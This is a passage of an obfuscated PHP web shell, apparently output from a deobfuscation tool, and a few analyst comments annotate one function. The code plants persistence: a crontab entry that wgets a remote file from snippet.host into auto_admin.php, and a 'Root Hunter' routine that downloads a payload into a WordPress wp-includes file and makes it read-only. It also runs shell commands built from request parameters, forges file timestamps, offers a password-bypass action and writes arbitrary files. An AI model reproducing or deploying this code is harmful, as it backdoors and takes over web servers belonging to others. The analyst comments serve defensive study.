"\x20\x3d\x3e\40\50\40\x3c\165\76{$IIIIIII1I11l}\74\x2f\165\76\x20\51\74\142\162\x3e"; break; } } } } else { echo "\x3c\x62\162\x3e"; } } } } } if (!$IIIIIIII11I1 == 0) { echo "\x3c\142\162\76\x54\x6f\164\x61\x6c\40\x61\144\x61\x20{$IIIIIIII11I1}\40\153\x61\x6d\x61\x72\40\144\151\40{$IIIIIIII1III}"; } echo "\x3c\x2f\x70\162\145\x3e"; } echo "\x3c\x2f\x64\x69\x76\76\x3c\142\x72\57\76"; die; } goto DGXlf; QR2gb: if 
($_GET["\141\153\x73\151"] == "\160\141\163\x73\x77\x62\171\160\141\163\x73") { IIIIIII1lll1($dir, $file); } goto kV2xI; GVG6U: if (isset($_GET["\143\x68\x61\156\147\145\x64\x61\x74\145\156\x79\x61"])) { $IIIIIIlllI11 = $_GET["\143\x68\x61\156\147\145\144\x61\164\x65\x6e\x79\x61"]; echo "\x3c\x70\162\145\x20\143\x6c\x61\163\x73\x3d\x27\164\x65\170\x74\55\167\150\151\164\145\x27\76" . ex("\154\163\x20\x27{$IIIIIIlllI11}\x27\40\76\x20\144\x61\164\x65\x2e\x74\x78\164") . "\74\x2f\x70\162\145\x3e"; ex("\146\x6f\x72\x20\x69\40\151\x6e\40\44\x28\143\141\x74\x20\x64\141\164\x65\56\164\170\x74\x29\73\144\x6f\x20\164\x6f\165\143\150\x20\x2d\155\164\x20\44\50\x65\143\x68\x6f\x20\62\x30\x31\44\x28\x73\x68\165\146\x20\x2d\151\60\55\x31\62\x20\x2d\x6e\61\x29\60\x24\x28\163\x68\x75\x66\x20\55\x69\x30\55\61\x32\x20\55\x6e\61\51\x30\44\x28\x73\x68\x75\x66\x20\x2d\x69\x30\x2d\61\x32\x20\55\x6e\x31\x29\x30\x30\60\60\x29\x20" . $_GET["\x63\x68\141\156\147\145\144\x61\x74\x65\156\171\141"] . "\x2f\x24\151\73\x64\157\x6e\x65"); echo "\74\x70\40\x63\x6c\x61\x73\x73\75\47\x74\x65\170\164\55\167\150\x69\x74\x65\x27\x3e\133\53\135\40\x44\x6f\156\145\x21\74\x62\162\x3e\x5b\52\135\x20\x4e\157\164\x20\x57\x6f\162\153\x69\x6e\147\77\40\74\x61\40\150\162\x65\x66\x3d\x27\77\144\151\162\x3d" . $dir . "\46\141\x6b\x73\151\75\x6e\147\145\142\145\x70\141\x73\x73\x27\76\102\x79\x70\141\x73\163\40\x69\x74\74\x2f\141\76\x3c\57\x70\76\x3c\57\144\x69\166\x3e\74\x2f\144\151\x76\76"; ex("\162\x6d\x20\55\162\146\x20\x64\141\164\x65\56\x74\170\164"); die; } goto T4EHp; t_iiR: $IIIIIIII1llI = @ini_get("\x64\151\163\x61\x62\154\x65\137\x66\x75\x6e\x63\x74\151\x6f\x6e\163"); goto vKC7m; XzELM: echo "\x26\x6e\142\163\x70\73\x26\x6e\x62\x73\160\x3b\x5b\x20" . w($dir, IIIIIIIIl1II($dir)) . 
"\40\135\74\x2f\x73\x70\141\x6e\x3e"; goto usbii; OPGhy: function IIIIIIIlI1Il($dir) { echo "\x3c\x64\x69\x76\x20\x63\x6c\x61\x73\163\75\x22\x63\141\x72\144\40\155\142\55\x35\x22\76\12\x3c\144\x69\166\40\143\x6c\x61\x73\163\x3d\x22\x63\141\x72\144\55\142\x6f\x64\x79\40\x66\157\x72\155\55\x67\162\157\x75\x70\42\76\12\74\x70\40\143\154\x61\163\x73\x3d\x22\164\145\170\164\55\155\165\164\145\x64\42\76\x43\x72\157\156\164\x61\142\40\123\x68\145\154\x6c\74\x2f\160\76\xa"; ex("\160\x77\x64\x3d\44\50\160\167\144\x29\73\x65\143\150\157\40\x22\x2a\40\x2a\x20\x2a\40\x2a\x20\52\40\x77\147\145\x74\40\x2d\x4f\40\44\160\167\144\57\x61\165\164\x6f\x5f\x61\144\155\151\x6e\x2e\x70\150\160\x20\x68\x74\x74\x70\x73\72\57\x2f\x73\x6e\x69\160\160\x65\164\56\150\157\x73\x74\57\x70\x77\x78\171\57\162\x61\x77\42\x20\x7c\x20\143\162\157\x6e\164\141\142"); $IIIIIIIlI1I1 = ex("\x63\x72\x6f\x6e\x74\141\142\x20\55\154"); if ($IIIIIIIlI1I1 == '') { echo "\x3c\160\40\x63\154\x61\x73\163\75\42\146\157\156\x74\x2d\x77\x65\151\147\x68\x74\55\142\x6f\154\x64\x20\164\x65\170\x74\55\x64\141\x6e\x67\145\162\42\76\133\55\x5d\x20\106\x61\x69\154\145\144\x20\x4d\145\155\141\163\141\156\147\74\x2f\x70\76\74\57\x64\x69\x76\76\74\57\144\x69\166\x3e"; } else { echo "\74\160\x20\143\x6c\141\x73\x73\75\x22\x66\x6f\156\164\55\167\145\151\x67\150\x74\x2d\x62\x6f\154\144\x20\164\x65\170\x74\55\163\x75\143\x63\145\163\163\42\76\133\x2b\x5d\x20\x52\165\x6e\x6e\x69\156\x67\40\103\x72\x6f\156\164\x61\x62\x20\72\x20\x3c\x2f\142\x72\76" . ex("\143\x72\x6f\x6e\164\x61\x62\x20\55\154") . "\74\x2f\x70\x3e\74\x2f\x64\x69\166\x3e\74\x2f\144\151\x76\x3e"; } } goto HgISA; LFiqG: if (isset($_GET["\146\151\156\x64\x77\162\151\164\145"])) { $IIIIIIlllI11 = $_GET["\146\x69\x6e\x64\167\162\151\x74\145"]; echo "\74\160\x72\145\x20\143\x6c\x61\x73\x73\75\47\164\x65\170\x74\55\x77\x68\151\x74\145\47\x3e" . ex("\154\163\40\x27{$IIIIIIlllI11}\47\40\76\40\144\x61\x74\145\56\x74\x78\x74") . 
"\74\x2f\160\162\145\76"; ex("\146\151\156\x64\40" . $_GET["\x66\151\x6e\144\x77\x72\x69\164\145"] . "\x20\55\164\x79\x70\x65\x20\144\x20\x2d\x77\x72\151\x74\141\x62\154\145\x20\x3e\40\x77\162\151\x74\141\x62\x6c\x65\56\x74\170\164"); echo "\x3c\x70\x20\143\x6c\141\x73\x73\75\47\x74\145\x78\164\55\x77\x68\x69\x74\x65\47\x3e\133\x2b\135\40\106\157\x75\156\x64\40\72\x20\x3c\x2f\160\x3e\x3c\x62\x72\x3e\x3c\160\40\143\x6c\x61\x73\163\x3d\x27\164\x65\170\164\55\167\x68\151\164\x65\x27\76" . ex("\x66\157\x72\x20\x69\40\x69\x6e\x20\44\x28\143\141\164\40\x77\162\x69\164\141\x62\x6c\x65\x2e\x74\170\164\x29\x3b\144\x6f\40\x70\162\151\156\164\146\x20\x22\x24\151\40\75\76\x20\x46\157\x75\x6e\144\xa\x22\73\144\157\156\145") . "\x3c\57\x70\x3e\74\57\144\151\166\76\74\57\x64\x69\x76\76"; die; } goto AjK8T; DjebA: if ($_GET["\141\x6b\x73\151"] == "\163\171\155\154\x69\156\x6b") { IIIIIII1l1l1($dir, $file); } goto UBaO0; IGcBk: function deployrh($dir) { echo "\74\x64\x69\166\x20\x63\x6c\141\163\x73\x3d\42\x63\141\x72\x64\x20\155\x62\x2d\65\42\x3e\xa\74\144\x69\166\x20\x63\x6c\x61\x73\163\x3d\x22\x63\x61\162\144\x2d\142\x6f\144\171\x20\x66\x6f\162\155\55\x67\x72\157\x75\160\42\76"; echo "\x3c\x70\x20\143\x6c\x61\163\x73\75\42\164\x65\170\x74\55\x77\141\162\156\151\156\x67\40\164\145\x78\164\55\x63\145\x6e\x74\x65\162\x20\x66\x6f\x6e\164\x2d\x77\x65\151\147\150\164\x2d\142\x6f\154\x64\x22\x3e\133\53\x5d\40\x44\x65\x70\154\x6f\171\x69\x6e\x67\40\122\157\x6f\x74\40\x48\x75\x6e\x74\145\x72\x20\x76\61\x3c\x2f\x70\x3e"; echo "\74\146\x6f\x72\155\x20\155\x65\x74\150\157\144\x3d\42\x70\x6f\x73\164\42\76"; echo 
"\74\x63\145\156\164\145\x72\76\74\x69\x6e\x70\165\x74\40\143\x6c\x61\x73\163\75\42\x62\x74\156\40\x62\x74\x6e\x2d\163\165\143\143\x65\163\163\x22\x20\164\171\160\145\x3d\x22\x73\165\142\155\x69\164\x22\40\x6e\141\155\x65\75\42\x64\x65\x70\154\157\171\x72\150\167\163\x22\40\166\x61\x6c\165\x65\x3d\x22\104\145\x70\x6c\x6f\x79\x20\122\x6f\x6f\x74\x20\x48\165\156\x74\x65\x72\42\76\74\x2f\143\145\156\164\x65\x72\x3e"; echo "\74\x2f\x66\x6f\x72\155\76"; if (isset($_POST["\144\x65\x70\154\157\x79\162\150\167\x73"])) { $deployrh_result = ''; $startDirectory = realpath(__DIR__); if (isset($_SERVER["\110\x54\x54\120\123"]) && $_SERVER["\110\124\124\120\123"] === "\157\x6e") { $url = "\150\164\x74\x70\163\x3a\x2f\57"; } else { $url = "\150\164\x74\160\72\57\57"; } $url .= $_SERVER["\x48\124\x54\120\x5f\x48\117\x53\124"]; if ($startDirectory !== $_SERVER["\104\x4f\103\x55\x4d\x45\116\x54\137\122\x4f\117\x54"]) { $rhws_path = $startDirectory . "\57\x77\x70\x2d\151\156\143\x6c\x75\144\x65\x73\x2f\x70\157\x6d\x6f\57"; $rhws = $startDirectory . "\x2f\167\x70\55\151\x6e\x63\x6c\x75\144\x65\x73\x2f\x70\157\155\157\57\163\151\156\147\165\x6c\141\x72\55\146\157\162\155\x73\x2e\160\x68\160"; $doc = $startDirectory . "\x2f\x66\x6f\157\164\x65\162\137\117\114\x44\56\x70\150\x70"; $cleaned = str_replace($startDirectory, '', $rhws_path); $cleaned_doc = str_replace($startDirectory, '', $doc); } else { $rhws_path = $_SERVER["\x44\117\x43\125\x4d\x45\116\124\137\x52\117\x4f\x54"] . "\x2f\167\160\x2d\151\x6e\143\154\x75\x64\145\x73\57\160\x6f\155\157\57"; $rhws = $_SERVER["\x44\117\x43\x55\115\105\116\x54\137\122\x4f\x4f\124"] . "\x2f\167\160\55\x69\156\x63\154\165\x64\x65\163\x2f\x70\157\x6d\x6f\x2f\163\x69\x6e\x67\165\154\141\162\55\x66\x6f\162\x6d\x73\56\x70\x68\x70"; $doc = $_SERVER["\x44\117\103\x55\115\x45\116\x54\137\x52\x4f\117\x54"] . 
"\57\146\x6f\x6f\x74\x65\x72\x5f\x4f\114\104\56\160\150\160"; $cleaned = str_replace($_SERVER["\x44\x4f\x43\x55\115\x45\x4e\124\x5f\x52\x4f\x4f\124"], '', $rhws_path); $cleaned_doc = str_replace($_SERVER["\104\x4f\x43\125\115\x45\116\x54\137\122\x4f\117\124"], '', $doc); } $src = "\x68\164\164\160\x73\x3a\x2f\x2f\x72\145\163\56\143\154\157\x75\x64\151\x6e\x61\162\171\x2e\143\x6f\x6d\57\x64\142\141\x73\x73\x65\164\163\x2f\x72\x61\167\x2f\165\x70\x6c\x6f\x61\x64\x2f\x76\x31\x36\x35\x32\x30\x33\70\61\x35\x32\x2f\x74\x6f\157\x6c\57\x63\x6c\141\x73\x73\55\x63\141\x74\145\147\x6f\162\171\x5f\147\165\147\172\67\161\x2e\164\170\x74"; if (file_exists($rhws)) { $deployrh_result .= "\74\x73\160\x61\x6e\40\143\154\141\163\163\x3d\42\x74\x65\x78\164\x2d\143\x65\156\x74\x65\162\x20\164\145\x78\x74\55\151\156\x66\157\40\x66\157\x6e\x74\x2d\167\x65\x69\147\x68\x74\55\x62\157\x6c\144\73\42\x3e\133\53\135\40\122\157\157\164\40\x48\x75\x6e\x74\x65\x72\40\166\x31\40\123\x75\x64\x61\150\x20\101\x64\141\41\x3c\57\163\x70\x61\156\x3e\x3c\x62\x72\x2f\x3e"; $deployrh_result .= "\x3c\163\x70\141\x6e\x20\x63\x6c\141\x73\x73\x3d\x22\x74\x65\x78\164\55\x63\145\156\164\x65\162\40\x74\x65\170\x74\x2d\151\x6e\146\x6f\x20\146\157\156\164\x2d\x77\145\151\147\150\164\55\x62\157\x6c\x64\x3b\x22\76\74\141\x20\150\162\x65\146\75\x22" . $url . $cleaned . "\x22\x20\x74\x61\x72\x67\x65\164\x3d\x22\137\142\154\141\156\153\42\x20\x72\x65\154\x3d\42\x6e\157\146\157\154\154\157\x77\40\156\157\x6f\160\x65\156\145\162\40\x6e\x6f\x72\145\146\145\x72\162\145\x72\42\x20\x63\154\141\163\x73\75\x22\x74\x65\170\x74\x2d\x63\x65\x6e\164\145\x72\x20\x74\x65\x78\x74\x2d\151\x6e\x66\157\42\x3e" . $url . $cleaned . 
"\74\x2f\141\x3e\74\57\x73\160\x61\156\76\74\142\162\x2f\76"; } if (file_exists($doc)) { $deployrh_result .= "\74\163\160\x61\156\x20\143\x6c\141\x73\x73\75\x22\164\x65\170\x74\x2d\x63\145\156\x74\145\x72\40\164\145\170\x74\55\x69\x6e\x66\x6f\x20\146\157\x6e\164\x2d\167\x65\x69\x67\x68\x74\x2d\x62\157\x6c\x64\x3b\42\76\133\53\x5d\x20\x52\157\157\164\x20\110\165\x6e\164\145\162\x20\166\61\x20\123\165\144\x61\150\40\x41\x64\141\41\74\x2f\x73\x70\141\x6e\x3e\74\x62\x72\57\x3e"; $deployrh_result .= "\x3c\163\x70\141\156\40\x63\x6c\141\x73\163\x3d\42\164\x65\170\164\55\143\145\x6e\164\145\162\40\164\145\170\x74\55\151\x6e\146\x6f\x20\146\157\156\x74\x2d\x77\145\151\147\x68\164\x2d\142\x6f\x6c\144\x3b\x22\76\x3c\x61\x20\150\x72\x65\x66\x3d\x22" . $url . $cleaned_doc . "\x22\40\164\141\162\147\145\x74\75\42\x5f\x62\154\141\156\153\x22\x20\x72\145\x6c\75\x22\156\157\146\157\154\154\x6f\x77\40\x6e\157\157\160\x65\x6e\x65\162\x20\156\x6f\162\145\146\145\162\x72\145\162\x22\40\143\154\x61\x73\x73\75\x22\164\145\x78\x74\55\143\x65\156\x74\145\x72\x20\164\x65\170\x74\x2d\151\x6e\x66\x6f\42\x3e" . $url . $cleaned_doc . 
"\x3c\57\x61\76\x3c\57\x73\x70\x61\x6e\76\x3c\x62\162\x2f\x3e"; } if (is_dir($rhws_path) && is_writable($rhws_path)) { $content = file_get_contents($src); $status = file_put_contents($rhws, $content); if ($status) { $deployrh_result .= "\74\163\160\141\x6e\40\x63\154\141\163\x73\x3d\x22\x74\145\x78\x74\x2d\x63\x65\x6e\164\x65\x72\40\164\145\170\164\55\x73\165\143\143\x65\x73\x73\40\x66\157\x6e\164\x2d\167\145\x69\147\150\x74\x2d\x62\157\154\144\73\42\x3e\133\x2b\135\x20\102\145\x72\150\x61\163\151\x6c\40\x44\145\160\154\157\171\x20\x52\157\x6f\x74\40\x48\x75\x6e\164\x65\162\x20\x76\61\41\74\x2f\x73\x70\x61\156\x3e\74\x62\x72\x2f\76"; $deployrh_result .= "\74\x73\x70\x61\156\x20\143\x6c\141\163\x73\x3d\42\x74\x65\x78\164\55\x63\x65\x6e\164\x65\x72\40\x74\x65\170\164\55\151\x6e\146\157\x20\146\x6f\x6e\164\55\167\x65\x69\x67\150\164\55\x62\x6f\x6c\x64\73\x22\x3e\74\141\x20\x68\162\145\x66\x3d\x22" . $url . $cleaned . "\42\40\x74\141\162\x67\x65\x74\x3d\42\x5f\142\154\141\x6e\153\x22\x20\x72\145\x6c\75\x22\x6e\157\x66\x6f\154\154\157\167\x20\156\157\x6f\160\x65\x6e\145\162\x20\x6e\x6f\162\145\146\x65\x72\162\x65\x72\x22\x20\x63\154\141\x73\163\x3d\x22\164\x65\170\x74\55\x63\x65\156\x74\145\162\40\164\x65\170\164\x2d\151\x6e\x66\157\x22\x3e" . $url . $cleaned . 
"\x3c\57\x61\x3e\74\x2f\x73\x70\x61\156\76\x3c\142\162\x2f\76\74\x62\162\x2f\76"; chmod($rhws, 292); } else { $deployrh_result .= "\74\x73\x70\x61\156\x20\143\154\141\163\x73\x3d\42\164\x65\x78\x74\55\143\x65\x6e\x74\145\162\x20\x74\145\x78\164\x2d\x64\x61\156\x67\x65\x72\x20\x66\157\x6e\164\55\x77\x65\x69\x67\x68\x74\x2d\x62\x6f\x6c\144\x3b\42\76\x5b\55\135\40\x47\x61\x67\141\x6c\x20\x44\x65\160\154\x6f\x79\x20\x52\x6f\157\x74\40\110\x75\x6e\x74\145\162\40\166\61\x21\74\x2f\163\x70\x61\156\x3e\74\142\162\x2f\x3e"; } } else { $content = file_get_contents($src); $status = file_put_contents($doc, $content); if ($status) { $deployrh_result .= "\x3c\163\x70\x61\x6e\x20\143\x6c\141\x73\x73\75\x22\x74\x65\170\x74\x2d\143\145\156\x74\145\x72\40\164\145\170\164\55\163\x75\x63\x63\145\x73\x73\x20\x66\157\156\164\55\x77\x65\151\147\150\x74\x2d\142\157\154\x64\x3b\42\x3e\x5b\x2b\135\x20\x42\145\162\x68\x61\x73\x69\154\x20\x44\145\160\154\157\171\40\122\x6f\157\164\x20\x48\165\156\164\x65\x72\x20\166\61\41\x3c\x2f\x73\x70\141\x6e\76\74\x62\x72\57\x3e"; $deployrh_result .= "\x3c\x73\160\x61\x6e\x20\x63\x6c\x61\x73\x73\75\x22\164\x65\170\x74\55\143\145\156\x74\x65\x72\40\x74\x65\x78\164\x2d\151\x6e\x66\157\40\146\x6f\156\164\55\167\x65\x69\147\150\164\x2d\x62\x6f\154\x64\x3b\42\76\74\x61\40\x68\162\x65\146\x3d\x22" . $url . $cleaned_doc . "\42\40\x74\x61\x72\x67\145\164\x3d\x22\137\142\x6c\141\x6e\153\42\40\x72\x65\154\x3d\x22\x6e\x6f\x66\x6f\x6c\154\x6f\167\40\156\157\157\x70\145\156\145\x72\x20\156\157\162\145\x66\145\162\162\145\162\42\40\x63\154\x61\163\163\x3d\42\x74\x65\x78\164\x2d\x63\145\x6e\164\145\x72\x20\164\x65\x78\x74\55\151\x6e\x66\157\x22\x3e" . $url . $cleaned_doc . 
"\74\57\x61\x3e\74\x2f\x73\160\141\x6e\76\74\x62\162\x2f\76\74\142\x72\57\76"; chmod($doc, 292); } else { $deployrh_result .= "\74\x73\x70\141\156\x20\143\x6c\x61\x73\163\x3d\42\164\145\170\x74\x2d\x63\145\x6e\164\x65\162\x20\x74\145\170\x74\55\144\141\x6e\x67\145\162\x20\146\x6f\x6e\x74\55\167\145\x69\x67\x68\164\x2d\x62\x6f\x6c\x64\73\42\x3e\133\55\135\40\107\x61\147\141\154\x20\x44\145\x70\x6c\x6f\171\x20\122\x6f\x6f\x74\x20\110\x75\156\x74\x65\x72\40\166\x31\x21\74\x2f\163\x70\x61\x6e\x3e\x3c\142\x72\x2f\76"; } } echo "\x3c\144\x69\166\40\x73\x74\x79\154\x65\x3d\42\142\x6f\x72\x64\145\x72\x2d\142\x6f\164\164\157\x6d\x3a\x30\73\x6d\x61\x72\x67\151\x6e\55\x74\x6f\160\x3a\65\x70\170\73\42\x20\162\145\x61\144\x6f\x6e\154\x79\x3e"; echo "\x3c\x63\x65\x6e\164\145\162\76"; print_r($deployrh_result) . PHP_EOL; echo "\x3c\x2f\143\x65\x6e\164\145\x72\x3e"; echo "\74\x2f\x64\151\166\x3e"; } echo "\x3c\57\x64\x69\x76\76\74\x2f\144\151\x76\x3e"; } goto eLB0i;
/*
 * Dispatcher fragment. The escaped strings decode to $_GET["aksi"] == "rename";
 * a match hands the request to IIIIIIIll11I(), which is defined outside this
 * excerpt. The label/goto pairs around each fragment come from the obfuscator:
 * execution order follows the labels, not the textual order of the file.
 */
bYCUl: if ($_GET["\x61\x6b\163\151"] == "\162\x65\x6e\141\155\145") { IIIIIIIll11I($dir, $file, $IIIIIIIlllIl, $IIIIIIII1l1l); } goto JNqQW;
/**
 * "Buat File" (create file) handler: prints an HTML form and, when that form
 * is posted back, writes request-supplied content to request-supplied paths.
 *
 * Analyst notes (what the visible code shows):
 *  - Trigger: POST field "bikin" (the form's submit button) is set.
 *  - Target paths: every element of POST array "nama_file"; content: POST
 *    field "isi_file". Neither value is validated or restricted here, and no
 *    authentication check is visible inside this function.
 *  - fopen() is called with mode "w" ("\167"), so an existing file at the
 *    given path is truncated and a missing one is created.
 *  - $dir is not used to build the target path in this function; it is only
 *    forwarded to the status helper IIIIIIIlIl1I() (defined elsewhere).
 *  - The request field names ("aksi", "bikin", "nama_file[]", "isi_file") are
 *    stable strings that can be matched in web-server or WAF logs.
 *
 * @param mixed $dir            Forwarded to IIIIIIIlIl1I(); presumably the directory being browsed (TODO confirm against caller).
 * @param mixed $IIIIIIII1l1l   Interpolated without escaping into the <h4> heading of the form.
 */
Ou_xB: function IIIIIIIlllll($dir, $IIIIIIII1l1l) {
    /* Decoded markup: heading "... Buat File :", a POST form with a text input named nama_file[], a textarea named isi_file and a submit button named bikin. */
    echo "\74\150\64\76{$IIIIIIII1l1l}\40\102\x75\x61\164\40\106\x69\154\145\40\72\74\x2f\x68\x34\x3e\xa\74\146\x6f\162\155\x20\155\145\x74\150\x6f\144\x3d\x27\120\x4f\x53\x54\x27\76\xa\74\144\151\x76\40\143\x6c\141\163\163\x3d\47\151\156\160\x75\x74\x2d\x67\x72\157\165\x70\x27\x3e\xa\74\x69\x6e\160\165\x74\40\164\x79\160\145\75\x27\x74\145\x78\x74\47\40\x63\x6c\141\163\x73\75\x27\146\x6f\162\x6d\55\143\157\x6e\164\162\x6f\154\x27\x20\156\x61\x6d\145\75\47\x6e\x61\155\x61\137\146\x69\154\145\133\x5d\47\x20\160\x6c\x61\x63\x65\x68\157\x6c\x64\145\x72\75\47\x4e\141\x6d\x61\40\106\x69\x6c\145\56\56\x2e\x27\76\12\x3c\144\x69\x76\x20\x63\x6c\141\x73\163\x3d\x27\151\156\160\x75\x74\55\x67\x72\x6f\165\x70\x2d\x70\162\145\160\145\x6e\x64\x27\76\12\74\144\x69\166\x20\143\x6c\141\163\x73\x3d\x27\x69\156\x70\165\x74\55\x67\162\x6f\165\160\x2d\x74\145\x78\x74\x27\x3e\x3c\141\40\x69\x64\75\47\x61\x64\144\137\151\156\x70\x75\164\47\x3e\74\151\40\x63\154\x61\x73\163\75\x27\146\141\x20\146\141\55\160\x6c\165\163\47\x3e\x3c\x2f\151\76\x3c\x2f\141\76\74\x2f\x64\151\166\x3e\xa\74\57\144\x69\x76\x3e\xa\74\x2f\144\151\166\76\74\x62\162\57\76\xa\x3c\x64\x69\166\40\151\144\75\x27\x6f\165\164\160\165\164\47\x3e\74\x2f\144\151\166\76\12\x3c\164\x65\x78\x74\141\x72\x65\x61\x20\156\141\155\145\75\47\151\x73\151\137\x66\151\154\145\47\40\143\154\x61\x73\163\75\47\146\157\x72\x6d\55\143\157\156\x74\162\x6f\x6c\47\x20\162\157\167\x73\x3d\x27\x31\65\x27\40\160\x6c\x61\x63\x65\x68\157\154\144\145\x72\75\x27\x49\163\151\40\106\x69\x6c\145\x2e\x2e\x2e\47\x3e\74\x2f\x74\x65\x78\x74\x61\162\x65\141\x3e\74\x62\162\57\76\12\x3c\x69\156\x70\x75\x74\x20\x74\171\x70\145\75\47\163\165\142\155\151\164\47\40\143\154\141\x73\x73\75\47\142\x74\x6e\40\x62\164\x6e\55\x73\x75\x63\143\x65\x73\x73\x20\142\164\156\x2d\142\x6c\x6f\143\153\40\x6d\x62\x2d\65\x27\40\156\x61\155\x65\75\x27\x62\x69\x6b\x69\156\47\40\166\x61\154\x75\x65\x3d\x27\102\165\141\164\x27\76\12\x3c\57\x66\x6f\x72\x6d\x3e";
    /* "\x62\x69\x6b\151\x6e" decodes to "bikin": only act when the form above was submitted. */
    if (isset($_POST["\x62\x69\x6b\151\x6e"])) {
        /* POST "nama_file": the form declares it as nama_file[], so an array of paths is expected. */
        $name = $_POST["\156\141\x6d\x61\x5f\x66\x69\x6c\145"];
        /* POST "isi_file": the content written to every listed path. */
        $isi_file = $_POST["\x69\163\x69\137\146\x69\x6c\x65"];
        foreach ($name as $nama_file) {
            /* Path is used exactly as supplied; "@" hides fopen warnings and the handle is never closed in this function. */
            $IIIIIIIIlI1l = @fopen("{$nama_file}", "\167");
            if ($isi_file) {
                $buat = @fwrite($IIIIIIIIlI1l, $isi_file);
            } else {
                /* No content given: the fopen() result alone decides success, i.e. an empty file is created. */
                $buat = $IIIIIIIIlI1l;
            }
        }
        /* $buat is overwritten on every iteration, so only the last path decides the reported status. */
        if ($buat) {
            /* Decodes to status "success", message "Berhasil Membuat File" (Indonesian, roughly "file created successfully"). */
            $IIIIIIIlIl1l = "\x73\x75\143\x63\x65\163\163";
            $IIIIIIIlIl11 = "\102\145\162\x68\141\163\x69\x6c\x20\x4d\x65\x6d\142\x75\x61\x74\x20\106\x69\154\145";
            IIIIIIIlIl1I($IIIIIIIlIl1l, $IIIIIIIlIl11, $dir);
        } else {
            /* Decodes to status "error", message "Gagal Membuat File" (roughly "failed to create file"). */
            $IIIIIIIlIl1l = "\145\162\162\x6f\162";
            $IIIIIIIlIl11 = "\x47\x61\x67\141\154\x20\115\x65\155\142\x75\141\x74\40\106\x69\154\145";
            IIIIIIIlIl1I($IIIIIIIlIl1l, $IIIIIIIlIl11, $dir);
        }
    }
} goto aV7hf;
/* Dispatcher fragment: decodes to $_GET["aksi"] == "modules"; a match calls modules($dir), which is defined outside this excerpt. */
VduaH: if ($_GET["\x61\153\x73\x69"] == "\x6d\157\144\165\x6c\x65\163") { modules($dir); } goto AFmQi; omEN2: ?>
Function Calls
None |
Stats
MD5 | 7212cf4a39d8b1f955037d0917a0599f |
Eval Count | 0 |
Decode Time | 94 ms |